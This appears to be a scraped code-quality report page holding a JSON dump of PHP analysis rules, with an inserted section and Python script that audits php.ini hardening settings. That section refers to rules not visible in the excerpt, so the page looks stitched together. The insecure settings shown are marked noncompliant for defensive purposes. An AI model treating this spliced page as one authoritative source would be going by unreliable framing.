Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n  <li> It can significantly impair the readability of the code. <\/li>\n  <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n  <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. 
<\/li>\n  <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n  <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n  other than that cause by the increment or decrement operator <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n  effects <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n  same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a &lt; $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning 
<\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n  echo(\"i = $i\");\n  $i++;\n  if ($i &lt; 10){\n    goto loop;\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++){\n  echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/php.html by fixme
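The excerpt above carries three PHP configuration rules that are worth checking outside SonarQube as well: `session.use_trans_sid` must not be explicitly enabled, while `enable_dl` and `file_uploads` must be explicitly set to 0. The following is an added example, not code from the sonar-rules project or from SonarSource: a small php.ini reader plus an audit function that applies exactly those three rules, including the "missing directive counts as on" semantics the rule text describes for the on-by-default options. The parser, the `RULES` table and both sample ini fragments are my own constructions.

```python
# php.ini hardening check for the three configuration rules quoted above
# (session.use_trans_sid, enable_dl, file_uploads). Added example; the parser
# and the rule table are not part of the sonar-rules project.
from __future__ import annotations

import re
from typing import Dict, List, Tuple

# Directive -> (PHP default is on?, why an enabled value is a problem).
# Defaults follow the rule descriptions: enable_dl and file_uploads are on by
# default, so an absent directive is a finding; session.use_trans_sid is off
# by default and is only reported when explicitly enabled.
RULES: Dict[str, Tuple[bool, str]] = {
    "session.use_trans_sid": (False, "session id is propagated in URLs (leaks via Referer and logs)"),
    "enable_dl": (True, "dl() lets a script ignore open_basedir restrictions"),
    "file_uploads": (True, "accepts file uploads from any client"),
}

_ASSIGN = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*(.*)$")


def _strip_comment(line: str) -> str:
    """Drop a ';' comment, but not a ';' inside a double-quoted value."""
    quoted = False
    for i, ch in enumerate(line):
        if ch == '"':
            quoted = not quoted
        elif ch == ";" and not quoted:
            return line[:i]
    return line


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: 'key = value' pairs, last assignment wins.

    Section headers such as [PHP] or [Session] are skipped because directive
    names are global; ${ENV} expansion and multi-line values are not handled.
    """
    directives: Dict[str, str] = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith("["):
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        directives[key] = value
    return directives


def ini_bool(value: str) -> bool:
    """Mirror PHP's reading of a boolean ini string: on/yes/true are true,
    otherwise the leading integer decides, so "0", "Off" and "" are false."""
    v = value.strip().lower()
    if v in ("on", "yes", "true"):
        return True
    m = re.match(r"[+-]?\d+", v)
    return bool(m) and int(m.group(0)) != 0


def audit_php_ini(text: str) -> List[Tuple[str, str]]:
    """Return (directive, finding) pairs for every violated rule."""
    directives = parse_php_ini(text)
    findings: List[Tuple[str, str]] = []
    for key, (default_on, why) in RULES.items():
        if key in directives:
            if ini_bool(directives[key]):
                findings.append((key, f"explicitly enabled: {why}"))
        elif default_on:
            findings.append((key, f"not set, so PHP's default (on) applies: {why}"))
    return findings


# Constructed sample fragments, not taken from any real deployment.
NONCOMPLIANT_INI = """\
; php.ini
[PHP]
enable_dl = On                 ; Noncompliant
file_uploads = 1               ; Noncompliant
[Session]
session.use_trans_sid = 1      ; Noncompliant
"""

HARDENED_INI = """\
[PHP]
enable_dl = 0
file_uploads = Off
[Session]
session.use_trans_sid = 0
"""

if __name__ == "__main__":
    for name, ini in (("noncompliant", NONCOMPLIANT_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: {audit_php_ini(ini) or 'no findings'}")
```

Run it against the file that `php --ini` reports as loaded, not against a copy in the repository: FPM pool files and Apache `php_admin_value` directives can override php.ini, and a runtime `ini_get()` cannot tell an explicit `enable_dl=0` from the default, which is why the rules are phrased against the ini file. Note also that `dl()` has been unavailable in most web SAPIs since PHP 5.3, so the `enable_dl` finding mainly matters for CLI and CGI execution; it is still cheap to set explicitly.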

      BUG found
      Open

              window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. 
Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  if (condition2) {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 &amp;&amp; condition2) {\n  ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and 
<code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 &amp;&amp; $condition2) || ($condition3 &amp;&amp; $condition4)) &amp;&amp; $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) &amp;&amp; my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n  private $foo = 4;                       \/\/foo is unused\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 
parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 42; $i++){}  \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n  <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n  <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  ;                                              \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n  echo $p;;                                      \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i &lt;= 10; doSomething($i), $i++);   \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n  echo $p;\n\n  for ($i = 1; $i &lt;= 10; $i++) {\n    doSomething($i);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n  the first character following the null statement is a white-space character. 
<\/li>\n  <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n  that the first character following the null statement is a white-space character. <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n  or while condition <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n  or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  public $myField;\n\n  public function doSomething() {\n    $myField = 0;\n    ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a 
library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n  <li> final or abstract <\/li>\n  <li> public or protected or private <\/li>\n  <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... 
*\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ?  exp : true;\n$booleanVariable = condition ?  exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition &amp;&amp; exp;\n$booleanVariable = !condition ||  exp;\n$booleanVariable = condition &amp;&amp; exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay 
in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n  return $numerator \/ $denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. 
This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n  if (condition1) {\n    return true;\n  } else {\n    if (condition2) {\n      return false;\n    } else {\n      return true;\n    }\n  }\n  return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo() {}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n    ...\n  }\n\n  private function unusedPrivateFunction() {  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo(){}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should 
